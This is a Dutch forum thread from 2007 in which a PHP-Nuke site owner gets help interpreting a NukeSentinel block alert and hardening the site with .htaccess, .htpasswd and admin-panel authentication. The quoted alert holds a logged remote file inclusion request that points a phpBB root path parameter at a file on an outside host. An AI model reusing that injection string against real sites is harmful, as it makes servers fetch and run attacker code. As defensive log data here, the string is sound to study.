NukeSentinel Blocked IP melding - User Agent: libwww-perl

Posted: Sat 14 Jul 2007 4:27

Krijg deze meldingen wel vaker gestuurd maar ben benieuwd wat ze eigenlijk proberen? Zal wel niet veel soeps zijn, maar moet ik me zorgen maken en kan ik nog iets doen om te verbeteren dat het ze lukt waar ze ook mee bezig zijn?
Ik werk trouwens met NukeSentinel laatste versie.

Date & Time: 2007-07-13 19:28:14 CEST GMT +0200 Blocked IP: 72.232.244.238 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.805
Query String: www.website.nl/modules/Forums/admin/admin_users.php?phpbb_root_path=http://cbaa.net.au/ty.txt??
Get String: www.website.nl/modules/Forums/admin/admin_users.php?phpbb_root_path=http://cbaa.net.au/ty.txt??
Post String: www.website.nl/modules/Forums/admin/admin_users.php
Forwarded For: none
Client IP: none
Remote Address: 72.232.244.238
Remote Port: 48804
Request Method: GET

Edit: Topic titel gewijzigd, voor de zoekfunctie door BlueLion - Administrator

Posted: Sat 14 Jul 2007 6:56

Dit wijst erop dat Sentinel zn werk doet.

HEt lijkt erop dat ze een "oude"exploit gebruiken om waarschijnlijk zo aan je inlog gevens te komen.
Stelletje kinderen $#@$#$$#$@@$# Evil or Very Mad

Wat je het beste kunt doen, is de blocker op permanent blocken zetten, of de IP adressen handmatig blokkeren.

Administrator Joined: Aug 21, 2004 Posts: 2836

BL

Posted: Sat 14 Jul 2007 17:53

Oke Zeromechanic/Blue Lion,

ik heb dus permanent blocken al aanstaan, maar Sentinel blockt ze niet?Komt dat omdat ik onderstaande dingen nog niet had ingevuld? Maar waar BL nu mee komt had ik niet aanstaan omdat ik niet wist waar het voor is? kun je me dat eens uitleggen?

Als je dit wilt aanzetten staan er ook van die waarschuwingen bij zoals dat je paswoord ingevuld moet zijn! Heb dit nu gedaan en als ik het goed begrijp gaan deze instellingen dus kijken in een lijst met geblokkeerde ip's ofzo, klopt dat?
Ik ga nu deze instellingen dus ook maar aanzetten zoals htaccess, staaccess, ftaccess. Wat is het verschil hier tussen......

Maar ik heb eens gekeken naar de path's die erbij staan maar dat klopt bij mij niet volgens mij? En staaccess en ftaccess kan ik helemaal niet vinden volgens mij? Of kijk ik daar overheen zeker? Dus als je me eens uit kunt leggen hoe dit in te vullen ben ik wederom een gelukkig mens Razz

Na even gegoogled te hebben vond ik dit, klopt het wat hierin staat? Als dat zo is heb ik denk ik een klein probleem. Mijn htaccess file staat in mijn hoofddir en niet zoals Nuke Sentinel aangeeft in:

Normally: /home/aquarium/public_html/at/.htaccess

Dit is het stuk wat ik vond bij Google, wat erbij staat van telnet en een dir aanmaken moet je overheen lezen omdat dit niet nodig is:

De directory aanmaken
De eerste stap die je moet nemen, is het aanmaken van de directory die je wilt beveiligen. Als je al eerder een directory hebt gemaakt die je wilt beveiligen dan kun je deze stap overslaan.

Je kunt een directory aanmaken vanuit Telnet, maar voor het gemak kun je het ook nog gewoon met je FTP programma doen. Maak dus nu de nieuwe directory die je wilt gaan beveiligen. In de rest van dit artikel noem ik deze directory beveiligd. In de codes hieronder moet je deze naam dus vervangen door de naam die je aan je eigen directory hebt gegeven.

Het .htaccess bestand maken
De tweede stap is om het .htaccess bestand te maken. Je kunt dit ook weer vanuit Telnet doen met een programma als Pico of VI, maar hier bespreek ik hoe je dit met een gewone teksteditor op je eigen systeem kunt doen.

Open dus in je favoriete teksteditor een nieuw tekstbestand (.txt)

Kopieer en plak daarin de volgende code:

AuthUserFile /usr/www/beveiligd/.htpasswd
AuthGroupFile /dev/null
AuthName "Geheime Pagina"
AuthType Basic
<Limit GET POST>
require valid-user
</Limit>

In de code hierboven moet je nog twee dingen aanpassen:

Bij AuthUserFile moet je het pad naar de directory die je wilt beveiligen invullen. Als je niet weet wat het pad precies is dan kun je dat meestal nagaan via je FTP programma of door op de site van je webhost te kijken.
Waar ik hierboven Geheime Pagina heb getypt, moet je de titel invullen die je aan het wachtwoord-venster wilt geven. Bezoekers krijgen deze titel dan te zien (zie ook het plaatje hierboven).
Als je dit gedaan hebt dan moet je het .htaccess bestand uploaden naar de directory die je wilt beveiligen. Plaats het dus niet in de hoofddirectory van je site, anders wordt je hele site beveiligd en kan geen enkele bezoeker er meer inkomen zonder gebruikersnaam en wachtwoord.

Nu moet je alleen het .htaccess bestand nog even hernoemen. Meestal kan dat door het bestand in je FTP programma te selecteren en dan op de rechtermuisknop te klikken. Kies dan voor een optie als Rename file of iets dergelijks. Verander dan .htaccess.txt in .htaccess, dus zonder een extensie!

Het .htpasswd bestand maken
Nu het .htaccess bestand op zijn plaats staat, is het tijd om het .htpasswd bestand te gaan maken.

Om dat te kunnen doen moet je Telnet of SSH-toegang tot je webserver hebben. Je kunt gebruik maken van Telnet via de functie "uitvoeren" in Windows. Dit vind je onder de Start-knop. Type in het volgende venster:
telnet www.jedomeinnaam.nl.

Vervolgens moet je de gebruikersnaam en het wachtwoord die je van je webhost hebt gekregen invoeren. Voor meer informatie over Telnet kun je het beste even op de site van je webhost kijken.

Het kan zijn dat het gebruik van Telnet niet is toegestaan door je webhost, maar dat je wel via Secure Shell (SSH) de server mag benaderen. In dat geval moet je een geschikte client downloaden. Ik kan je aanraden om Putty te gebruiken (gratis). Het is verder niet moeilijk om verbinding te maken met de server. Het meeste wijst zich vanzelf. Als er nog onduidelijkheden zijn dan kun je het beste de documentatie op de site van Putty bekijken of weer bij je webhost kijken of informeren.

Goed, ik ga ervan uit dat je nu verbinding met de server hebt gemaakt via Telnet of SSH. Doorloop nu de volgende stappen om het .htpasswd bestand te maken.

Kijk eerst waar je bent. Type daarvoor het commando pwd en druk op enter. Als je al in de directory zit die je wilt beveiligen dan kun je door naar de volgende stap. Anders moet je eerst naar deze directory toe gaan. Dat doe je door cd beveiligd te typen. Natuurlijk vervang je "beveiligd" weer door de naam die je eerder aan de te beveiligen directory hebt gegeven.
Nu je in de te beveiligen directory zit, moet je het volgende commando typen (alleen de eerste keer!) om het .htpasswd aan te maken:
htpasswd -c .htpasswd gebruikersnaam
("gebruikernaam" moet je vervangen door de gebruikersnaam die je toegang wilt geven tot de beveiligde directory).
Vervolgens zal de server je vragen om een password op te geven voor deze gebruiker. Vul daar dus een wachtwoord in. Je moet dit vervolgens nog een keer bevestigen.
Als je nieuwe gebruikers toe wilt voegen die ook toegang tot de directory moeten krijgen dan moet je het volgende commando gebruiken:
htpasswd .htpasswd nieuwe_gebruikersnaam
Tot slot
Dat was het! Nu kun je eenvoudig directories beveiligen en nieuwe gebruikers toevoegen. Als je het .htaccess bestand op een gegeven moment weer wilt verwijderen dan kan dat door vanuit telnet/SSH rm .htaccess te typen. Je kunt dit trouwens ook weer makkelijk via je FTP programma doen.

Administrator Joined: Aug 21, 2004 Posts: 2836

Een .htaccess bestand staat los van Sentinel. Wat ik gepost heb kan je dus gebruiken zonder dat je Sentinel hiervoor instelt. Sentinel maakt alleen gebruik van het .htaccess bestand en slaat hierin gegevens op, zoals IP adressen die geen toegang hebben tot je website/webspace.

Het bestand .staccess wordt gebruikt om een gecodeerd password, die toegang geeft tot je admin panel, op te slaan. Dit is een extra authenticatie, een extra beveiliging.
Probeer de link naar mijn admin panel op deze website te benaderen, hiervoor achter de url nog admin.php zetten.

BL

Junior Support Joined: Sep 10, 2006 Posts: 150

plak eronder

Administrator Joined: Aug 21, 2004 Posts: 2836

alleen als dit standaard uit staat.

De rewrite conditie die ik meegeef in bovenstaand, zorgt ervoor dat deze bekende dataminers alle toegang wordt ontzegt tot je website.

Voor overige kwaad willende heb je wel gelijk, en is elke request voor het forum pad direct een aanleiding om die toegang te ontzeggen.

BL

Junior Support Joined: Sep 10, 2006 Posts: 150

ik heb ook een hele lijst ip adressen van badbots enz....
ik zal het ff in me .htaccess plakken

Posted: Sun 15 Jul 2007 18:15

Ben net eens gaan zoeken en tot mijn verrassing vind ik 2 htaccess bestanden?
Eentje in de root van mijn site die helemaal leeg is en eentje in de map abuse in de directory waar mijn site draait, daar staat alleen in allow all. Dus welke moet ik nu nemen vraag ik me af en wat moet ik nu in dit bestand zetten? En moet ik ook in Sentinel dan het path invoeren of niet? En het bestand staaccess als ik in Sentinel de setup aanklik krijg ik een melding:

Save this in :

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files >
deny from all
</Files>

<Files admin.php>
<Limit GET POST PUT>
require valid-user
</Limit>
AuthName "Restricted by NukeSentinel(tm)"
AuthType Basic
AuthUserFile
</Files>
# -------------------------------------------
# End of NukeSentinel(tm) admin.php Auth
# -------------------------------------------

wat moet ik hiermee doen? Moet ik dit zetten in de map Abuse in het htaccess bestand?

@BL

heb net je admin.php gevolgd en krijg dan een pop up met de melding dat dit beveilgd is! Is wel een stuk veiliger ja Shocked

Administrator Joined: Aug 21, 2004 Posts: 2836

Je zal er wanneer je alle mappen doorspit meerdere vinden. Dit is ter beveiliging/toegang geven tot/toegang weigeren van die mappen.

Posted: Sun 15 Jul 2007 20:55

1.
CHMOD de bestanden .htaccess, .staccess en eventueel .ftaccess naar 666 (rw-rw-rw).

Maar moet ik dit met alle bestanden doen die er zijn of alleen voor bepaalde directories BL?

Administrator Joined: Aug 21, 2004 Posts: 2836

Nee, vergeet alle .htaccess bestanden die je kan vinden in alle mappen en submappen.
Welke voor jouw belangrijk zijn, en voor NukeSentinel relevant zijn de .htaccess, .staccess en .ftaccess in de root. Oftewel waar je config.php en mainfile.php ook te vinden zijn.

BL

Posted: Sun 15 Jul 2007 21:17

Pffff, zag al een hoop werk aankomen Very Happy

Maar hier staan er geen, heb ze denk ik bij de installatie van Sentinel niet de sample files geupload..... Hier ligt dat toch aan of niet BL? Ik heb die nog wel ergens, anders kan ik ze alsnog daar naartoe uploaden toch?

Administrator Joined: Aug 21, 2004 Posts: 2836

De sample bestanden zijn standaard leeg.
Maak een tekst bestand, noem deze htaccess, upload deze naar je webspace en rename het bestand naar .htaccess, CHMOD naar 666, en klaar.
Zelfde doen voor .staccess en .ftaccess.
Windows accepteert geen bestandsnamen .htaccess bij het opslaan van een nieuw document. Vandaar zonder punt (.).

BL

Posted: Sun 15 Jul 2007 21:24

Oke BL,

wat moest ik toch zonder jouw!!!
En velen anderen trouwens ook, ga weer verder stoeien.
Bedankt Laughing